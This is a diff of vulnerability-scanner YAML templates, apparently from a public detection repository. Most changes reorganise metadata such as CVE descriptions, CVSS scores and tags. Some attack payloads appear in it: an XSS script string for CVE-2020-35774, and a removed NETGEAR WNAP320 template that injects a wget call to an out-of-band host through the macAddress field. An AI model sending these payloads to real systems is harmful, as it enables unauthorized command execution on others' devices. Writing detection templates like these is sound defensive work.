server/handler/HistogramQueryHandler.scala in Twitter TwitterServer (aka twitter-server) before 20.12.0, in some configurations, allows XSS via the /histograms endpoint.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35774
tags: cve,cve2020,xss,twitter-server
twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala.
reference:
- https://advisory.checkmarx.net/advisory/CX-2020-4287
- https://nvd.nist.gov/vuln/detail/CVE-2020-35774
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-35774
cwe-id: CWE-79
tags: cve,cve2020,xss,twitter-server
requests:
- method: GET
@ -22,9 +24,9 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
@ -34,3 +36,5 @@ requests:
part: header
words:
- text/html
# Enhanced by mp on 2022/04/04

11
cves/2020/CVE-2020-35847.yaml
View File

@ -5,15 +5,16 @@ info:
author: dwisiswant0
severity: critical
description: |
resetpassword method of the Auth controller,
which is responsible for changing the user password using the reset token.
reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
tags: cve,cve2020,nosqli,sqli,cockpit,injection
Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
reference:
- https://swarm.ptsecurity.com/rce-cockpit-cms/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35847
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2020-35847
cwe-id: CWE-89
tags: cve,cve2020,nosqli,sqli,cockpit,injection
requests:
- method: POST
@ -33,3 +34,5 @@ requests:
part: body
regex:
- 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9]+)"'
# Enhanced by mp on 2022/04/04

13
cves/2020/CVE-2020-7247.yaml
View File

@ -1,16 +1,19 @@
id: CVE-2020-7247
info:
name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution
author: princechaddha
severity: critical
reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
tags: cve,cve2020,smtp,opensmtpd,network,rce,oast
reference:
- https://www.openwall.com/lists/oss-security/2020/01/28/3
- https://nvd.nist.gov/vuln/detail/CVE-2020-7247
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2020-7247
cwe-id: CWE-78,CWE-755
description: "smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation."
description: "OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation."
tags: cve,cve2020,smtp,opensmtpd,network,rce,oast
network:
- inputs:
@ -41,4 +44,6 @@ network:
- type: word
part: raw
words:
- "Message accepted for delivery"
- "Message accepted for delivery"
# Enhanced by mp on 2022/04/04

10
cves/2020/CVE-2020-9483.yaml
View File

@ -5,14 +5,16 @@ info:
author: pikpikcu
severity: high
description: |
When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.
reference: https://github.com/apache/skywalking/pull/4639
tags: cve,cve2020,sqli,skywalking
When using H2/MySQL/TiDB as Apache SkyWalking storage and a metadata query through GraphQL protocol, there is a SQL injection vulnerability which allows access to unexpected data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.
reference:
- https://github.com/apache/skywalking/pull/4639
- https://nvd.nist.gov/vuln/detail/CVE-2020-9483
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-9483
cwe-id: CWE-89
tags: cve,cve2020,sqli,skywalking
requests:
- method: POST
@ -41,3 +43,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/05

8
cves/2020/CVE-2020-9484.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-9484
info:
name: Apache Tomcat RCE by deserialization
name: Apache Tomcat Remote Command Execution
author: dwisiswant0
severity: high
description: |
@ -11,7 +11,9 @@ info:
c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and
d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control.
Note that all of conditions a) to d) must be true for the attack to succeed.
reference: http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html
reference:
- http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-9484
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.00
@ -39,3 +41,5 @@ requests:
- "ObjectInputStream"
- "PersistentManagerBase"
condition: and
# Enhanced by mp on 2022/04/04

11
cves/2021/CVE-2021-20114.yaml
View File

@ -1,20 +1,20 @@
id: CVE-2021-20114
info:
name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor
name: TCExam <= 14.8.1 Sensitive Information Exposure
author: push4d
severity: high
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files.
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.
reference:
- https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true
- https://nvd.nist.gov/vuln/detail/CVE-2021-20114
tags: cve,cve2021,tcexam,disclosure,exposure
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-20114
cwe-id: CWE-200
tags: cve,cve2021,tcexam,disclosure,exposure
requests:
- method: GET
path:
@ -32,3 +32,6 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/05

4
cves/2021/CVE-2021-20150.yaml
View File

@ -4,7 +4,7 @@ info:
name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure
author: gy741
severity: medium
description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
reference:
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
@ -52,3 +52,5 @@ requests:
group: 1
regex:
- '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'
# Enhanced by mp on 2022/04/05

11
cves/2021/CVE-2021-21234.yaml
View File

@ -1,20 +1,21 @@
id: CVE-2021-21234
info:
name: Spring Boot Actuator Logview - Directory Traversal
name: Spring Boot Actuator Logview Directory Traversal
author: gy741,pikpikcu
severity: high
description: spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability.
description: |
spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package "eu.hinsch:spring-boot-actuator-logview".
reference:
- https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234
- https://github.com/cristianeph/vulnerability-actuator-log-viewer
- https://nvd.nist.gov/vuln/detail/CVE-2021-21234
tags: cve,cve2021,springboot,lfi,actuator
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.70
cve-id: CVE-2021-21234
cwe-id: CWE-22
tags: cve,cve2021,springboot,lfi,actuator
requests:
- method: GET
@ -39,4 +40,6 @@ requests:
- "contains(body, 'fonts')"
- "contains(body, 'extensions')"
- "status_code == 200"
condition: and
condition: and
# Enhanced by mp on 2022/04/01

6
cves/2021/CVE-2021-28854.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-28854
info:
name: VICIdial - Multiple sensitive Information disclosure
name: VICIdial Sensitive Information Disclosure
author: pdteam
severity: high
description: VICIdial's Web Client contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/2021.
description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems.
reference: https://github.com/JHHAX/VICIdial
classification:
cve-id: CVE-2021-28854
@ -30,3 +30,5 @@ requests:
words:
- 'vdc_db_query'
part: body
# Enhanced by mp on 2022/04/06

9
cves/2021/CVE-2021-3019.yaml
View File

@ -1,19 +1,20 @@
id: CVE-2021-3019
info:
name: Lanproxy Directory Traversal
name: ffay lanproxy Directory Traversal
author: pikpikcu
severity: high
description: ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.
description: "ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet."
reference:
- https://github.com/ffay/lanproxy/commits/master
- https://github.com/maybe-why-not/lanproxy/issues/1
tags: cve,cve2021,lanproxy,lfi
- https://nvd.nist.gov/vuln/detail/CVE-2021-3019
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-3019
cwe-id: CWE-22
tags: cve,cve2021,lanproxy,lfi
requests:
- method: GET
@ -36,3 +37,5 @@ requests:
- "config.admin.password"
condition: and
part: body
# Enhanced by mp on 2022/04/04

12
cves/2021/CVE-2021-3293.yaml
View File

@ -1,20 +1,20 @@
id: CVE-2021-3293
info:
name: Emlog 5.3.1 Path Disclosure
description: emlog v5.3.1 has full path disclosure vulnerability in t/index.php, which allows an attacker to see the path to the webroot/file.
name: emlog 5.3.1 Path Disclosure
description: "emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file."
author: h1ei1
severity: high
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3293
- https://github.com/emlog/emlog/issues/62
- https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md
tags: cve,cve2021,emlog,fpd
- https://nvd.nist.gov/vuln/detail/CVE-2021-3293
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-3293
cwe-id: CWE-22
tags: cve,cve2021,emlog,fpd
requests:
- raw:
@ -33,4 +33,6 @@ requests:
- "<b>Warning</b>"
- "on line"
- "expects parameter"
condition: and
condition: and
# Enhanced by mp on 2022/04/04

2
cves/2021/CVE-2021-38702.yaml
View File

@ -35,4 +35,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/03/28
# Enhanced by cs on 2022/04/01

10
vulnerabilities/other/visual-tools-dvr-rce.yaml → cves/2021/CVE-2021-42071.yaml
View File

@ -1,14 +1,16 @@
id: visual-tools-dvr-rce
id: CVE-2021-42071
info:
name: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
name: Visual Tools DVR VX16 4.2.28.0 Unauthenticated OS Command Injection
author: gy741
severity: critical
description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
description: Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
reference:
- https://www.exploit-db.com/exploits/50098
- https://nvd.nist.gov/vuln/detail/CVE-2021-42071
classification:
cve-id: CVE-2021-42071
tags: visualtools,rce,oast,injection
requests:
- raw:
- |

4
default-logins/versa/versa-default-login.yaml
View File

@ -5,7 +5,6 @@ info:
author: davidmckennirey
severity: high
description: Versa Networks SD-WAN application default admin credentials were discovered.
tags: default-login,versa,sdwan
reference:
- https://versa-networks.com/products/sd-wan.php
classification:
@ -13,6 +12,7 @@ info:
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
tags: default-login,versa,sdwan
requests:
- raw:
@ -52,4 +52,4 @@ requests:
- "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')"
negative: true
# Enhanced by mp on 2022/03/11
# Enhanced by mp on 2022/04/06

6
default-logins/visionhub/visionhub-default-login.yaml
View File

@ -4,8 +4,7 @@ info:
name: VisionHub Default Login
author: Techryptic (@Tech)
severity: high
description: VisionHub application default admin credentials were discovered.
tags: visionhub,default-login
description: VisionHub application default admin credentials were accepted.
reference:
- https://www.qognify.com/products/visionhub/
classification:
@ -13,6 +12,7 @@ info:
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
tags: visionhub,default-login
requests:
- raw:
@ -39,4 +39,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/03/13
# Enhanced by mp on 2022/04/06

4
default-logins/weblogic/weblogic-weak-login.yaml
View File

@ -5,7 +5,6 @@ info:
author: pdteam
description: WebLogic default login credentials were discovered.
severity: high
tags: default-login,weblogic
reference:
- https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password
- https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/
@ -14,6 +13,7 @@ info:
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
tags: default-login,weblogic
requests:
- raw:
@ -65,4 +65,4 @@ requests:
status:
- 302
# Enhanced by mp on 2022/03/14
# Enhanced by mp on 2022/04/05

4
default-logins/wso2/wso2-default-login.yaml
View File

@ -8,12 +8,12 @@ info:
reference:
- https://docs.wso2.com/display/UES100/Accessing+the+Management+Console
- https://is.docs.wso2.com/en/5.12.0/learn/multi-attribute-login/
tags: default-login,wso2
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
tags: default-login,wso2
requests:
- raw:
@ -40,4 +40,4 @@ requests:
part: header
condition: and
# Enhanced by mp on 2022/03/13
# Enhanced by mp on 2022/04/05

4
default-logins/zmanda/zmanda-default-login.yaml
View File

@ -7,12 +7,12 @@ info:
description: "Zmanda default admin credentials admin:admin were discovered."
reference:
- https://www.zmanda.com
tags: zmanda,default-login
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
tags: zmanda,default-login
requests:
- raw:
@ -41,4 +41,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/03/13
# Enhanced by mp on 2022/04/04

65
iot/iotawatt-app-exposure.yaml
View File

@ -1,28 +1,37 @@
id: iotawatt-app-exposure
info:
name: IoTaWatt Configuration app
author: pussycat0x
severity: high
description: unauthenticated IoTaWatt energy monitor leads to upload to any of several third-party energy websites/database
metadata:
fofa-query: 'app="IoTaWatt-Configuration-app"'
tags: iot,exposure
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- '<h3>Configure IoTaWatt Device</h3>'
- '<title>IoTaWatt Configuration app</title>'
condition: and
part: body
- type: status
status:
- 200
id: iotawatt-app-exposure
info:
name: IoTaWatt Configuration App Exposure
author: pussycat0x
severity: high
description: An IoTaWatt configuration app was discovered. Unauthenticated access to an IoTaWatt energy monitor could give a malicious attacker the means to upload to any of several third-party energy websites/database.
reference:
- https://docs.iotawatt.com/en/master/passConfig.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
metadata:
fofa-query: 'app="IoTaWatt-Configuration-app"'
tags: iot,exposure
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<h3>Configure IoTaWatt Device</h3>'
- '<title>IoTaWatt Configuration app</title>'
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/04/01

7
misconfiguration/aem/aem-userinfo-servlet.yaml
View File

@ -2,12 +2,11 @@ id: aem-userinfo-servlet
info:
author: DhiyaneshDk
name: AEM UserInfo Servlet
name: AEM UserInfo Servlet Credentials Exposure
severity: info
description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.
description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node."
tags: aem,bruteforce
requests:
- method: GET
path:
@ -29,3 +28,5 @@ requests:
part: header
words:
- 'application/json'
# Enhanced by mp on 2022/04/05

63
misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml
View File

@ -1,28 +1,35 @@
id: phpmyadmin-misconfiguration
info:
name: Sensitive data exposure
author: pussycat0x
severity: high
description: Unauthenticated phpmyadmin leads to exposure of sensitive information
reference: https://www.exploit-db.com/ghdb/6997
tags: phpmyadmin,misconfig
requests:
- method: GET
path:
- "{{BaseURL}}/phpmyadmin/index.php?db=information_schema"
- "{{BaseURL}}/phpMyAdmin/index.php?db=information_schema"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "var db = 'information_schema';"
- "var opendb_url = 'db_structure.php';"
condition: and
- type: status
status:
- 200
id: phpmyadmin-misconfiguration
info:
name: phpmyadmin Data Exposure
author: pussycat0x
severity: medium
description: An unauthenticated instance of phpmyadmin was discovered, which could be leveraged to access sensitive information.
reference: https://www.exploit-db.com/ghdb/6997
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id:
cwe-id: CWE-200
tags: phpmyadmin,misconfig
requests:
- method: GET
path:
- "{{BaseURL}}/phpmyadmin/index.php?db=information_schema"
- "{{BaseURL}}/phpMyAdmin/index.php?db=information_schema"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "var db = 'information_schema';"
- "var opendb_url = 'db_structure.php';"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/04/06

8
misconfiguration/unauthenticated-zipkin.yaml
View File

@ -1,10 +1,12 @@
id: unauthenticated-zipkin
info:
name: Unauthenticated Zipkin
name: Zipkin Discovery
author: dhiyaneshDk
severity: high
description: Unauthenticated access to Zipkin
description: Unauthenticated access to Zipkin was discovered.
reference:
- https://zipkin.io/
tags: unauth
requests:
@ -29,3 +31,5 @@ requests:
- defaultLookback
part: body
condition: and
# Enhanced by mp on 2022/04/06

11
technologies/neos-detect.yaml
View File

@ -3,9 +3,14 @@ id: neos-detect
info:
name: Neos CMS detection
author: k11h-de
description: some Neos websites remove the X-Flow-Powered Header, but they usually all have a comment line at the top of the body
description: Neos CMS was detected.
severity: info
reference: https://github.com/neos/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cve-id:
cwe-id: CWE-200
tags: tech,neos,cms
requests:
@ -23,4 +28,6 @@ requests:
extractors:
- type: kval
kval:
- 'x_flow_powered'
- 'x_flow_powered'
# Enhanced by mp on 2022/04/01

26
vulnerabilities/other/netgear-wnap320-rce.yaml
View File

@ -1,26 +0,0 @@
id: netgear-wnap320-rce
info:
name: NETGEAR WNAP320 Access Point - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: vulnerabilities in the web-based management interface of NETGEAR WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
reference:
- https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
tags: netgear,rce,oast,router
requests:
- raw:
- |
POST /boardDataWW.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

11
vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml
View File

@ -1,13 +1,18 @@
id: optilink-ont1gew-gpon-rce
info:
name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution
name: OptiLink ONT1GEW GPON Remote Code Execution
author: gy741
severity: critical
description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
description: OptiLink is susceptible to remote code execution vulnerabilities which could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
reference:
- https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id:
cwe-id: CWE-77
tags: optiLink,rce,oast,mirai
requests:
@ -29,3 +34,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/04/01

6
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
View File

@ -1,7 +1,7 @@
id: vrealize-operations-log4j-rce
info:
name: VMware vRealize Operations Tenant App Log4j JNDI RCE
name: VMware vRealize Operations Tenant App Log4j JNDI Remote Code Execution
author: bughuntersurya
severity: critical
description: VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application.
@ -12,9 +12,9 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-45046
metadata:
shodan-query: http.title:"vRealize Operations Tenant App"
tags: rce,log4j,vmware,vrealize
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
tags: rce,log4j,vmware,vrealize
requests:
- raw:
@ -46,4 +46,4 @@ requests:
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by mp on 2022/03/21
# Enhanced by mp on 2022/04/05

6
vulnerabilities/wordpress/diarise-theme-lfi.yaml
View File

@ -1,4 +1,5 @@
id: diarise-theme-lfi
info:
name: WordPress Diarise 1.5.9 Local File Disclosure
author: 0x_Akoko
@ -7,6 +8,9 @@ info:
reference:
- https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html
- https://cxsecurity.com/issue/WLB-2019050123
- https://woocommerce.com/?aff=1790
classification:
cwe-id: CWE-98
tags: wordpress,wp-theme,lfi
requests:
@ -24,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/05